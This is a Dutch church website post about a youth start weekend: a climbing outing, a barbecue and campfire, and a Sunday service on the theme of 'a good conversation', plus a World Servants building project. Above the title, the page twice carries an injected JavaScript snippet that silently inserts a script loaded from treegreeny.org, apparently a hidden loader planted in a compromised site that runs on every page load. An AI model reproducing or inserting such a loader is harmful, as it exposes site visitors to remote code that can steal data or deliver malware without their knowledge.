;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Startweekend, goede gesprekken op grote hoogte! - PKN Damwâld

Startweekend, goede gesprekken op grote hoogte!

Gepubliceerd op: zondag 23 september 2018

Het startweekend zit er weer op, zaterdag 15:00 begon het, de jongeren en leiding op pad naar de Burgum om te klimmen op grote hoogte! Na aantrekken van het klimharnas, helm en de veiligheidsinstructie mocht iedereen op pad! Verschillende parcours op verschillende hoogtes werden afgelegd, sommigen vonden het heel spannend, anderen deden alsof het niets was! Aan het einde was een heus tokkel parcours met verschillende lange banen wat echt fantastisch was! Nadat iedereen weer veilig op de grond was stond stond er bij de familie Kingma een heerlijke BBQ klaar, iedereen heeft genoten van lekker vlees, stokbrood maar vooral heel veel gezelligheid. In de avond werden er bij het kampvuur samen met Sign inspirerende liederen gezonden en was Robert aanwezig voor “een goed gesprek”! Maar ja, jongeren en zingen? Sommigen spelen liever spelletjes, dus werd er volop “30 seconds” gespeeld bij de warme kachel, oftewel het was een geslaagde dag!

Zondag de startdienst onder leiding van Dominee Otter en met muziek van Sign met als thema “een goed gesprek”. De kinderen mochten raden wat er in een grote bak zat, door met de handen te voelen zonder te kunnen zien wat er in zat, in het begin natuurlijk heel spannend, want ja, niemand weet wat er in kan zitten. Gelukkig viel het mee en werd er al vrij snel een hamer uit de bak gehaald, toen was de spanning eraf en ging de een na de ander voelen en raden wat het was. Dominee Otter legde uit dat het met gesprekken ook zo kan zijn, in het begin is het best spannend om met een (onbekend) persoon te praten, je weet niet wat het gesprek over zal gaan en je weet niet wat er is, maar door juist de stap de zetten, het wél te kun, kun je heel veel mooie en nieuwe dingen ontdekken bij de ander. Dus ga het gesprek niet uit de weg maar ga ervoor! Durf met iemand diep gesprek aan te gaan en help elkaar hierin!

In de dienst stelde ook de nieuwe World Servants groep uit Damwâld zich voor. Volgend jaar zomer zullen zij gaan bouwen in Bolivia aan een nieuwe kliniek en in Malawi aan klaslokalen. Komend jaar zullen de jeugdclubs sparen voor de beide projecten zodat ook de jongeren mee bouwen aan verandering in deze landen!

Het was een geslaagd startweekend en een hele mooie start voor wat komend seizoen weer gaat gebeuren in de kerk!

Aftermovie start zaterdag